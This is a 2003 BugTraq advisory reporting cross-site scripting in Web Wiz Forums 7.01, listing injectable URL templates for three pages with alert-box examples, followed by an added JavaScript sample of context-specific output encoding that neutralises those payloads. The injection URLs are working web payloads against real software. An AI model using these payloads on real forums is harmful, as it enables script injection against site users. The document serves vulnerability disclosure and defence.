BugTraq
Web Wiz Forums ver. 7.01
Oct 21 2003 08:41PM
HEX (hex hex net ru)
Information :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Patched version : none
Website : http://www.webwizforums.com
Problems : Permanent XSS
Objects :
°°°°°°°
- forum_members.asp
- members.asp
- pm_buddy_list.asp
Exploits :
°°°°°°°°
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22
Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22
http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22
Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22
http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1
Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1
Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.webwizforums.com...
[ Local time 2:30 | If only bears were bees... ]
[ Copyright by [HEX] | mailto:hex (at) hex.net (dot) ru ]
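
Added example, not part of the original post or of Web Wiz Forums: context-specific output encoding for the two kinds of sink the URLs above imply, run against the decoded parameter values with [CODE] left as a placeholder. The page templates and every function name below are assumptions made for illustration; the real ASP source is not shown in the advisory.

```javascript
// Added example (not from the advisory): output encoding for the two sinks its URLs imply.
// Assumed page templates; all function names here are hypothetical.

// Encode for a double-quoted HTML attribute value (the desc sink).
function encodeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Encode for a quoted JavaScript string inside an inline script block (the find/SF sink).
// Every character except ASCII letters and digits becomes \uXXXX, so the value cannot
// close the string, end the statement, or spell a closing script tag.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Assumed shape of the inline script that echoes the search term.
function renderSearchScript(find, encode) {
  return '<script>function x(){v = "' + encode(find) + '";}</' + 'script>';
}

// Assumed shape of the buddy-list markup that echoes the description.
function renderBuddyField(desc, encode) {
  return '<input name="desc" value="' + encode(desc) + '">';
}

// Decoded parameter values from the advisory's URL templates, [CODE] left as a placeholder.
const findValue = '";}[CODE];function x(){v = "';
const descValue = 'B">[CODE]<a s="';
const raw = (s) => s; // what the vulnerable pages effectively do

// Count double quotes that delimit strings/attributes in the rendered output.
function quoteCount(markup) {
  return (markup.match(/"/g) || []).length;
}

console.log(renderSearchScript(findValue, raw));            // 4 quotes: string closed early
console.log(renderSearchScript(findValue, encodeJsString)); // 2 quotes: one intact literal
console.log(renderBuddyField(descValue, raw));              // attribute closed early
console.log(renderBuddyField(descValue, encodeHtmlAttr));   // value stays inside the attribute
```

The HTML encoder is not a substitute for the JavaScript one: entity-encoding a value placed inside a script block leaves backslashes and line breaks unhandled, so each sink needs the encoder for its own context.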